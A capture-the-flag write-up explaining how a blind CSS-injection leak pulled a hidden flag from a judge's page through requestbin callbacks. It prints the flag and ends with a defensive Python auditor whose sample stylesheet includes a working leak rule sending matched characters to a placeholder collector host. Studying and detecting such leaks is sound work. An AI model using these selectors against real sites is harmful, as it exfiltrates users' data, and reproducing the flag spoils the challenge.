Beautiful Styles
I opened a contest to see who could create the most beautiful CSS styles. Feel free to submit your CSS styles to me and I will add them to my website to judge them. I'll even give you a sample of my site to get you started. Flag only consists of numbers and uppercase letters.
Author: Junhua
http://challs.nusgreyhats.org:33339
As there is no source code, it's a blind web challenge.
The challenge gets us to craft our own CSS for the application before submitting it to the admin for judging.
This is a classical XS Leak challenge. I came across two posts explaining the vulnerability extremely well.
https://portswigger.net/research/blind-css-exfiltration
https://book.hacktricks.xyz/pentesting-web/xs-search/css-injection
Using the payload from HackTricks, I selected the input with id flag to see if it could reach my requestbin instance.
We received two requests: one from us submitting and viewing the output, and one from the judge viewing the output. The flags from both endpoints are different.
After successfully developing a proof of concept, I coded a Python script to aid in retrieving the flag.
Running the script, I was able to iterate through each character of the charset, manually appending it to the flag variable if the request was sent.
We are also able to make logical guesses on parts of the flag to speed up the process, such as S34 being S34RCH and Y0 being YOU, and so on and so forth.
Flag: grey{X5S34RCH1fY0UC4NF1NDIT}
A more efficient approach is to start a threaded HTTP server and send the exploit in a separate thread. When the value of the flag is retrieved, it is then appended to the flag variable. A sample payload, albeit for XSS, is listed below. It follows a similar concept.
https://github.com/rizemon/exploit-writing-for-oswe?tab=readme-ov-file#stealing-http-cookies
Whilst it's not the most efficient, I was lazy and this works.
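From the defending side, a submitted stylesheet can be screened for this pattern before it is rendered to a privileged viewer such as the judge. The following is an added example, not part of the original write-up or the challenge's code: a heuristic audit that flags rules pairing a value-matching attribute selector with an external fetch. The function names, sample CSS and hosts are constructed assumptions.

```python
import re
from urllib.parse import urlparse

COMMENT = re.compile(r"/\*.*?\*/", re.S)
RULE = re.compile(r"([^{}]+)\{([^{}]*)\}")
# Attribute selector that tests a value, e.g. [value^="A"] or [value$="Z"]
ATTR_MATCH = re.compile(r"\[\s*[\w-]+\s*[\^$*~|]?=[^\]]*\]")
URL_TOKEN = re.compile(r"url\(\s*['\"]?([^'\")\s]+)", re.I)
IMPORT = re.compile(r"@import\s+(?:url\(\s*)?['\"]?([^'\")\s;]+)[^;]*;", re.I)

def is_external(url, allowed_hosts):
    """True when fetching the URL would contact a host outside allowed_hosts."""
    parsed = urlparse(url)
    return bool(parsed.netloc) and parsed.hostname not in allowed_hosts

def audit_css(css, allowed_hosts=frozenset()):
    """Return (reason, selector, url) findings for a user-submitted stylesheet."""
    css = COMMENT.sub("", css)
    findings = []
    for url in IMPORT.findall(css):
        if is_external(url, allowed_hosts):
            findings.append(("external-import", "@import", url))
    css = IMPORT.sub("", css)  # keep @import text out of the next selector
    for selector, body in RULE.findall(css):
        selector = " ".join(selector.split())
        for url in URL_TOKEN.findall(body):
            if not is_external(url, allowed_hosts):
                continue
            # A value test plus an outbound request is the leak primitive
            matched = ATTR_MATCH.search(selector)
            reason = "attribute-match-fetch" if matched else "external-fetch"
            findings.append((reason, selector, url))
    return findings

# Constructed sample submission; hosts are placeholders, not from the challenge
SAMPLE = """
/* theme */
body { background: url(/static/bg.png); color: #222; }
@import url("https://fonts.collector.example/a.css");
input#flag[value^="A"] { background: url(//collector.example/?c=A); }
h1 { background: url(https://cdn.site.example/h1.png); }
"""

if __name__ == "__main__":
    for finding in audit_css(SAMPLE, allowed_hosts={"cdn.site.example"}):
        print(finding)
```

A regex heuristic like this is only a first filter. Serving the page that renders submitted styles with a Content-Security-Policy that limits img-src, font-src and style-src to 'self' is the stronger control.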